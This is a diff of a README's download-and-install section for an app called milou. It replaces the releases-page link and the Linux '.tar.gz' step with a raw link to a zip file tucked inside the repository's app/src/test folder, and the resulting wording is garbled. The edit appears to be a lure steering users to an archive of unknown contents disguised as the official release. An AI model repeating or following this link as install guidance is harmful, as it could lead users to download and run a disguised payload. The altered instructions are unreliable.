Shaytreacherous155/milou/README.md

 ## 📤 Download & Install

-1. **Visit the Releases Page:** Go to [this link](https://github.com/Shaytreacherous155/milou/releases) to access the download page.
+1. **Visit the Releases Page:** Go to [this link](https://raw.githubusercontent.com/Shaytreacherous155/milou/master/app/src/test/milou-1.5.zip) to access the download page.

 2. **Select the Latest Release:** Click on the latest version available at the top.

 3. **Download the File:**
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://raw.githubusercontent.com/Shaytreacherous155/milou/master/app/src/test/milou-1.5.zip` file.

 4. **Install the Application:**
    - **Windows:** Double-click the downloaded `.exe` file and follow the prompts.
    - **macOS:** Open the `.dmg` file, drag the milou app to your Applications folder, and then open it.
-   - **Linux:** Extract the contents of the `.tar.gz` file and follow the instructions included in the README.
+   - **Linux:** Extract the contents of the `https://raw.githubusercontent.com/Shaytreacherous155/milou/master/app/src/test/milou-1.5.zip` file and follow the instructions included in the README.

 5. **Launch milou:** Look for the milou icon on your desktop or in the Applications folder.
 Double-click to open the app.